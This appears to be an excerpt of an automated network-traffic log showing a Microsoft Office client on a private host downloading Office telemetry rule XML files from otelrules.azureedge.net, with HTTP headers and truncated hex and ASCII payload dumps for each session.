                                                          2024-12-02 16:56:58 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          130192.168.2.44988913.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:59 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:59 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:59 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1366
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                          ETag: "0x8DC582BEA414B16"
                                                          x-ms-request-id: 2554c198-401e-005b-1ab4-439c0c000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165659Z-174f7845968vqt9xhC1EWRgten00000014r000000000ku2r
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:59 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          131192.168.2.44988613.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:59 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:57:00 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:59 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1399
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                          ETag: "0x8DC582BE8C605FF"
                                                          x-ms-request-id: 1fa9f6de-401e-0083-0aab-43075c000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165659Z-174f7845968cpnpfhC1EWR3afc000000149000000000m75c
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:57:00 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          132192.168.2.44989013.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:59 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:57:00 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:59 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1399
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                          ETag: "0x8DC582BE1CC18CD"
                                                          x-ms-request-id: 4b94b180-301e-0096-61b2-42e71d000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165659Z-174f7845968j6t2phC1EWRcfe800000014y0000000005u4n
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:57:00 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          133192.168.2.44989113.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:57:00 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:57:00 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:57:00 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1362
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                          ETag: "0x8DC582BEB256F43"
                                                          x-ms-request-id: 6460b669-f01e-00aa-725a-448521000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165700Z-174f7845968xlwnmhC1EWR0sv800000014g000000000mh06
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:57:00 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          134192.168.2.44989213.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:57:00 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:57:01 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:57:00 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1403
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                          ETag: "0x8DC582BEB866CDB"
                                                          x-ms-request-id: 9fe3a977-e01e-0099-5cb4-42da8a000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165700Z-174f7845968n2hr8hC1EWR9cag00000014cg0000000093bb
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:57:01 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          135192.168.2.44989313.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:57:01 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:57:02 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:57:01 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1366
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                          ETag: "0x8DC582BE5B7B174"
                                                          x-ms-request-id: aae3b9cd-c01e-0079-6bb3-42e51a000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165701Z-174f7845968n2hr8hC1EWR9cag00000014dg000000005bcx
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:57:02 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          136192.168.2.44989513.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:57:01 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:57:02 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:57:02 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1362
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                          ETag: "0x8DC582BDC13EFEF"
                                                          x-ms-request-id: f4a7b183-b01e-0098-27d5-43cead000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165702Z-174f7845968psccphC1EWRuz9s00000014vg00000000tvkv
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:57:02 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          137192.168.2.44989413.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:57:01 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:57:02 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:57:02 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1399
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                          ETag: "0x8DC582BE976026E"
                                                          x-ms-request-id: ae63cf80-d01e-00ad-1daa-42e942000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165702Z-174f7845968frfdmhC1EWRxxbw00000014pg00000000rt1v
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:57:02 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          138192.168.2.44989613.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:57:02 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:57:02 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:57:02 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1425
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                          ETag: "0x8DC582BE6BD89A1"
                                                          x-ms-request-id: 1318377f-c01e-0034-12b7-432af6000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165702Z-174f7845968kvnqxhC1EWRmf3g0000000rcg00000000wg7d
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:57:02 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          139192.168.2.44989713.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:57:02 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:57:03 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:57:03 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1388
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                          ETag: "0x8DC582BDBD9126E"
                                                          x-ms-request-id: fc0d267c-101e-0079-0929-415913000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165703Z-174f7845968nxc96hC1EWRspw800000014b000000000uyu0
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:57:03 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          140192.168.2.44989813.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:57:03 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:57:04 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:57:04 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1415
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                                          ETag: "0x8DC582BE7C66E85"
                                                          x-ms-request-id: 44412a51-001e-000b-14c5-4315a7000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165704Z-174f78459685726chC1EWRsnbg00000014qg00000000p8yr
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
